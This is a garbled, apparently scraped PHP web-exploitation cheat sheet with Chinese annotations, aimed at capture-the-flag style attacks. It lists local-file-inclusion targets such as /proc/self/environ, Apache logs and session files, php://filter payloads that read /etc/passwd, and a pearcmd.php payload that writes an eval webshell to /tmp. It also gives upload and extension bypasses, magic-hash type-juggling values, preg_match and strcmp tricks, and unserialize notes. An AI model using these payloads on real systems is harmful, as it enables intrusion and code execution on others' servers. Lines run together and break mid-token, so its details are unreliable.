aaa.php\x00.jpg
前後端: jpg; 解析: phplocation
phpinfo.php
common
docker
to config
配置模式:影響配置方式
$a[]=1;$a[]=2; // $a = [1,2]
: array append'system'('ls');
: call function by string$a='system';$a('ls');
class A{static function f(){}};['A','f']();
: call class by array$a = $function () use ($var) {};
as
會宣告變數 foreach([1] as $a);var_dump($a);
as
可以 reference,但是 as
操作本身等同 assign,所以要小心副作用$a=fn($b)=>$b+1;
class a{};$b='a';new $a;
沒辦法直接 new 'a';
'\system'('ls');
'\0' + name + filename + ':' + start_lineno + '$' + rtd_key_counter
short_open_tag
<?php
;Standard tags<?=
= <?php echo
:Short echo tag<?
: Short tag, default enabled2021/12 多了一堆黑魔法…
from easy to hard
/usr/local/lib/php/pearcmd.php
/proc/self/environ
& User-Agent
/var/log/apache2/access.log
/var/log/apache2/error.log
TODO
/var/log/auth.log
/tmp/PHP
/var/tmp
/var/lib/php/sessions
/var/lib/php/
/var/lib/php/sessions
/tmp/
/tmp/sessions/
Linux
.../php[a-zA-Z0-9]{6}
Windows.../php[A-F0-9]{4}.tmp
file_uploads=On
.../upload_progress_<PHPSESSID>
session.upload_progress.enabled
.../sess_<PHPSESSID>
$_SESSION['xxxx'] = 'ooooo';
<<>"
allow_url_fopen=Off = 0
to RFIref Gynvael Coldwind
${upload_tmp_dir}/php[a-zA-Z0-9]{6}
C:/Windows/php[A-F0-9]{4}.tmp
多文件: https://www.php.net/manual/en/features.file-upload.multiple.php 可利用繞過檢測?
php://filter/string.strip_tags/resource=/etc/passwd
php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA
/tmp/php[a-zA-Z0-9]{6}
C:\Windows\php<<
$_SESSION
PHPSESSID
.
in namesession.upload_progress.enabled
.../upload_progress_<PHPSESSID>
PHP_SESSION_UPLOAD_PROGRESS=xxxx
upload_progress_xxxx|.....
/proc/self/environ
& User-Agent
/var/lib/nginx/body/$X
/proc/$pid/cmdline
找 nginx pid/var/lib/nginx/fastcgi/x/y/0000000yx
/usr/local/lib/php/pearcmd.php
+
分隔參數 ?/usr/local/lib/php/pearcmd.php&+-c+/tmp/.feng.php+-d+man_dir=<?eval($_GET[0]);?>+-s
.png
,LFI 會 append .php
phar://aaa.png/bbb.php
php://filter/read=convert.base64-encode/resource=/etc/passwd
=
合法但是 decode 後沒有對應的字元所以會造成截斷,可以用 convert.iconv.UTF-8.UTF-7
去掉 =
string.strip_tags(<PHP 7.3.0): 清除 tag <>,會清除為閉合的 tag b<aaa
=> b
黑魔法
php_sys_lstat
解析 fd 到 deleted file: include(/proc/self/root/proc/self/root/proc.../proc/34/fd/15)
p == hash(p)
:0e215962017=>0e291242476940776845150308577824
hash(p) == 0
:12832323351hello=>0e107303994101791601610489605716
hash(num) == 0
: 240610708=>0e462097431906509019562988736854
hash(UPPER) == 0
: QLTHNDT=>0e405967825401955372549139051580
.V;m=*]b?-=>00e45653718969294213009554265803
require_once
uniqid
Returns timestamp based unique identifier as a string.
move_uploaded_file
make sure that the file name not bigger than 250 characters.
parse_url
scheme = 1*[ lowalpha | digit | "+" | "-" | "." ]
fragement
後才是 query
filter_var
sha1
preg_match
使用 PCRE
7.4.0 - 7.4.30: 第一或第二參數非字串回傳 false
$a=['A','m'];if(!preg_match('/a-z/i',$a))$a();
8.0.1 - 8.0.21, 8.1.0 - 8.1.8: 第一或第二參數非字串跳 error
regex 跳脫錯誤
var_dump(preg_match("/\\|a/", "\\"));
var_dump(preg_match("/\\\\|a/", "\\"));
回溯上限是 1,000,000
var_dump(strcmp([],'secret') == strcmp('secret','secret'));
/aaa.jpg/bbb.php
cgi.fix_pathinfo=0
修補<
->*
,一個有時會失效,連續兩個 <
轉換比較穩定>
->?
"
-> .
.
, include(htaccess) === include(.htaccess)
allow_url_fopen=Off
(RFI): include('\\remote\xxx.php')
serialize
, unserialze
__destruct
如果 parent object 有
__wakeup
的話順序不會被打亂]
__PHP_Incomplete_Class_Name
帶要找的類名__PHP_Incomplete_Class_Name
則 property 會被清空kaibro
bypass gd manipulate
store
The file's extension will be determined by examining the file's MIME type.